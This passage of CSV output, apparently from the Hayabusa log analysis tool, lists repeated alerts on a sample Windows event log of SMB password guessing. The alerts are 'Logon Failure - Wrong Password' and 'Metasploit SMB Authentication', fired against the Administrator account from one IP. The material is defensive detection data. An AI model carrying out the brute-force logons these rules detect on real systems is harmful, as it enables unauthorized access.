NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
